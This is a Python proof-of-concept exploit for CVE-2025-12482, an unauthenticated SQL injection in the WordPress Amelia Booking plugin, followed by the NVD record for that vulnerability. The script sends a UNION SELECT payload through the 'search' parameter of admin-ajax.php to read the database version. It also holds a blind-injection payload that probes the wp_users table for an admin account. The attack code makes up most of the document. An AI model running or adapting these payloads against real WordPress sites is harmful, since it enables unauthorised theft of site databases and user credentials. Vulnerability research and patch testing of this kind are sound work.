CVE-2025-12482

import requests import sys # CVE-2025-12482 SQL Injection PoC # Target: WordPress Amelia Booking plugin < 1.2.36 # Vulnerability: Unauthenticated SQL Injection via 'search' parameter TARGET_URL = "http://target-wordpress-site.com/" EVENTS_ENDPOINT = "wp-admin/admin-ajax.php" def exploit_sql_injection(): """Exploit SQL injection to extract database version""" # Malicious payload to extract database version # The 'search' parameter is vulnerable to SQL injection payload = "1' UNION SELECT 1,2,3,4,5,@@version,7,8,9,10-- -" params = { 'action': 'amelia_get_events_entities', 'search': payload, 'page': 1, 'length': 10 } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } try: response = requests.get( TARGET_URL + EVENTS_ENDPOINT, params=params, headers=headers, timeout=30, verify=False ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") # Check for successful exploitation if '5.' in response.text or '8.' in response.text or '10.' in response.text: print("[+] Potential SQL injection successful!") print(f"[+] Response snippet: {response.text[:500]}") else: print("[-] No obvious injection detected") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False return True def extract_users(): """Extract user data using blind SQL injection technique""" # Boolean-based blind injection to extract wp_users table data # Test if admin user exists payload_admin = "1' AND (SELECT COUNT(*) FROM wp_users WHERE user_login='admin')>0-- -" # Extract password hash character by character # This is a simplified example - real exploitation requires more complex logic print("[*] Testing for admin user existence...") print("[*] Blind SQL injection technique can be used for data extraction") print("[*] Recommended: Use sqlmap for comprehensive testing") return True if __name__ == "__main__": print("=" * 60) print("CVE-2025-12482 SQL Injection Exploitation") print("Amelia Booking Plugin < 1.2.36") print("=" * 60) exploit_sql_injection() extract_users()

{"cve": {"id": "CVE-2025-12482", "sourceIdentifier": "[email protected]", "published": "2025-11-16T05:15:59.280", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to SQL Injection via the ‘search’ parameter in all versions up to, and including, 1.2.35 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3390245/ameliabooking/tags/1.2.36/src/Infrastructure/Repository/Booking/Event/EventRepository.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cacf2e32-12cf-41a9-a57f-1135c165494c?source=cve", "source": "[email protected]"}]}}